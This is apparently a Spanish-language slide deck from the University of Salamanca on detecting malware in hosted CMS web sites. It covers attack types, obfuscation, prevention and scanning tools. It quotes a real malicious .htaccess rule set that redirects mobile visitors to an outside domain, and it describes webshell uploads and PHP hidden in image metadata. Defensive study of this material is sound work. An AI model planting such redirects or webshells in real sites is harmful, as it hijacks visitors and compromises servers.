DETECCIN DE MALWARE EN ALOJAMIENTOS WEB JUAN ANTONIO

DETECCIÓN DE MALWARE EN ALOJAMIENTOS WEB. JUAN ANTONIO GONZÁLEZ RAMOS UNIDAD DE SISTEMAS, SI-CPD UNIVERSIDAD DE SALAMANCA

ALOJAMIENTO DE WEBS EN LA USAL: CAMPUS.

FUNCIONAMIENTO DEL SERVICIO. • SOLICITUD DE ALOJAMIENTO WEB • ENTRADA DNS TIPO SITIO. USAL. ES 1. 057 sitios web • USO DE BASE DE DATOS CONFIGURABLE CON PHPMYADMIN • SOLICITANTES DE LOS ALOJAMIENTOS WEB • PERSONAL PAS E INVESTIGADOR • CON FORMACIÓN TÉCNICA (10% - 20%) • SIN FORMACIÓN TÉCNICA (EMPRESAS, BECARIOS…) • MONTAJE DE LAS PÁGINAS WEBS • EN BASE A CMS • WORDPRESS • DRUPAL • JOOMLA

FRECUENTES PROBLEMAS ENCONTRADOS. • PERSONAL NO SIEMPRE CONOCIMIENTOS TÉCNICOS DE PÁGINAS WEB • DIFICULTAD EN LA COMUNICACIÓN CON ELLOS • DIFICULTAD EN LA EXPLICACIÓN DE METODOLOGÍAS, PRÁCTICAS… • DESCONOCIMIENTO DE LOS PERMISOS • ASIGNACIÓN 777 A TODOS LOS FICHEROS Y CARPETAS • FALTA DE SEGURIDAD EN AUTENTICACIÓN • ¿QUÉ CONTRASEÑA LE PONEMOS A ADMIN…? _ _ _ • NULA ACTUALIZACIÓN DE VERSIONES • EXCESO DE INSERCIÓN DE MÓDULOS NO UTILIZADOS

ATAQUES A LOS SITIOS WEB: EVOLUCIÓN. 1. 990 Ataques a sistemas 2. 000 Ataques a redes

ATAQUES VISIBLES • ATAQUES TÍPICOS • EJECUCIÓN DE REDIRECCIONES • A SITIOS DE PUBLICIDAD: MONETIZACIÓN • A OBJETIVOSDDOS • DESPRESTIGIO INSTITUCIONAL: DEFACEMENT • PUBLICIDAD: VENTA DE VIAGRA • DETECCIONES ONLINE • ANALIZADORES SUCURI, HACKETTARGET, … • BUSCADORES • GOOGLE WEBMASTER TOOLS

ATAQUES INVISIBLES. • TIPOS DE ATAQUES • DISTRIBUCIÓN DE PAYLOADS: RANSOMWARE • RATS Y BACKDOORS PARA BOTNETS • ROBO DE INFORMACIÓN • CREDENCIALES • INVESTIGACIONES • MINADO DE CRIPTOMONEDAS • PROXYFICACIÓN • CASO CHINA-JAPÓN • ALOJAMIENTO ESCONDIDO • RED TOR • DETECCIÓN OFFLINE • ESCANEO DE FICHEROS

COMPOSICIÓN DE UN SITIO WEB. • GENERALMENTE ORGANIZADOS EN CMS • WORDPRESS • DRUPAL • JOOMLA • ELEMENTOS QUE LO COMPONEN • FICHEROS DE DATOS Y CÓDIGO P ( HP) • BASE DE DATOS MYSQL

CÓMO REALIZAN EL ATAQUE. Fichero. htaccess • OBJETIVOS QUE TRATAN DE MODIFICAR • FICHEROS. HTACCESS • FICHEROS. PHP • THEMES • SCRIPTS Rewrite. Engine on Rewrite. Cond %{HTTP_USER_AGENT} mobi [NC, OR] Rewrite. Cond %{HTTP_USER_AGENT} phone [NC, OR] Rewrite. Cond %{HTTP_USER_AGENT} mobile [NC, OR] Rewrite. Cond %{HTTP_USER_AGENT} android [NC, OR] Rewrite. Cond %{HTTP_USER_AGENT} pda [NC, OR] Rewrite. Cond %{HTTP_USER_AGENT} Series 60 [NC, OR] Rewrite. Cond %{HTTP_USER_AGENT} Opera. Mini [NC, OR] Rewrite. Cond %{HTTP_USER_AGENT} ipad [NC, OR] Rewrite. Cond %{HTTP_USER_AGENT} iphone [NC, OR] Rewrite. Cond %{HTTP_USER_AGENT} i. Pad [NC, OR] Rewrite. Cond %{HTTP_USER_AGENT} i. Phone [NC, OR] Rewrite. Cond %{HTTP_ACCEPT} "text/vnd. wap. wml|application/vnd. wap. xhtml+xml" [NC, OR] LA CARPETA MÁS PELIGROSA Rewrite. Cond %{HTTP_USER_AGENT} !windows. nt [NC] Rewrite. Cond %{HTTP_USER_AGENT} !x 11 [NC] BASTA SUBIR UN PHP Y TIENES UNWEBSHELL Rewrite. Cond %{HTTP_USER_AGENT} !unix [NC] Rewrite. Cond %{HTTP_USER_AGENT} !macos [NC] NO SE PUEDE BLOQUEAR Rewrite. Cond %{HTTP_USER_AGENT} !playstation [NC] • ACCESIBLE PARA IMÁGENES Y DEMÁS Rewrite. Cond %{HTTP_USER_AGENT} !google [NC] • CARPETA DE UPLOADS • • • Rewrite. Cond %{HTTP_USER_AGENT} !msn [NC] Rewrite. Cond %{HTTP_USER_AGENT} !windows-media-player [NC] Rewrite. Rule ^(. *)$ http: //google-statik. pw/l. php [L, R=302]

NUEVOS MÉTODOS DE ATAQUE. • GENERACIÓN DE BINARIOS CON PHP • SUBEN UN JPG/PNG/PDF… • A LA CARPETA DEUPLOADS • NO CONTIENE LA IMAGEN/FICHERO… • CONTIENE CÓDIGO PHP • UN PHP INYECTADO ABRE EL FICHERO Y LO EJECUTA • NUEVA GENERACIÓN • EL CÓDIGO PHP EN EL EXIF DE LAS IMÁGENES • CÓDIGO EN META-DATOS DE UNPDF

CONTENIDO DE LOS FICHEROS. • CÓDIGO OBFUSCADO • CODIFICADO SIN DIFICULTAD: BASE 64 • A VECES TAMBIÉN COMPRIMIDO: GZIP • EJECUCIÓN DEL CÓDIGO-CODIFICADO • FUNCIÓN EVAL • CON CURL ES UN AUTÉNTICO PROBLEMA • DESCARGA DE CÓDIGO ONLINE • ANULACIÓN DE FUNCIÓN EVAL • UTILIZADA AHORA POR CMSS

PREVENCIÓN. • UN WAF NO HACE MILAGROS, PERO AYUDA… • LA MAYORÍA DE OPERACIONES SON LEGALES • ACCESOS USUARIOS/CLAVES SENCILLAS • SUBIDA DE FICHEROS • LIMITACIÓN DEL ANCHO DE BANDA DE LA APLICACIÓN WEB • AYUDA EN CASOS DE SPAM, PORTSCAN… • PUEDE SER UN PROBLEMA MÁS QUE UNA SOLUCIÓN • REDUCE EL RENDIMIENTO • DETECCIÓN CÍCLICA CONTINUA • ANALIZAR FICHEROS UNA Y OTRA VEZ

LA DETECCIÓN. • HEURÍSTICAS PONDERADAS • SITUACIONES ANÓMALAS DETECTADAS • CRECIMIENTO DEL TAMAÑO DEL WEB (X 10, X 50…) • GRAN NÚMERO DE FICHEROS NUEVOS • COMBINACIONES DE VARIAS • REVISIÓN POR ONLINE • SUCURI, HACKERTARGET… • AVISOS DE NAVEGADORES • DETECCIONES DE FIRMAS • REGLAS YARA • DETECCIÓN PREVIA DE UN CMS • CONTINUA ACTUALIZACIÓN (OWASP) • ANTIVIRUS • DETECCIÓN DE WEBSHELLS • PROBLEMA • LARGO Y LENTO

HERRAMIENTAS QUE BUSCAMOS… • SABEMOS… • QUÉ BUSCAN • COMO ENTRAN • QUÉ INFECTAN • CON QUÉ LO INFECTAN • COMO DETECTARLO • NECESITAMOS HERRAMIENTAS • EXISTEN MUCHAS: GITHUB DERROCHA PYTHON • PAQUETES DEL OWASP • RECOMENDACIONES • HERRAMIENTAS (MUCHAS EN DESARROLLO)

HERRAMIENTAS QUE TENEMOS… • COMBINAMOS HERRAMIENTAS • SOFTWARE MAESTRO • INTERFAZ QUE LLAMA A OTRO SOFTWARE • LANZA EL ANÁLISIS CONTINUO • DIVERSAS UTILIDADES “CLASSES” O L“ IBS” • …ANÁLISIS POR FIRMAS YARA: OWASP WEB MALWARE SCANNER • …DETECCIÓN DE PHP “EXTRAÑO”: PHP SCANNER • …DETECCIÓN DEL CMS: WPSCAN, JOOMSCAN…CMSMAP • …DETECCIÓN EXTERNA: SITECHECKER API, VIRUS TOTAL API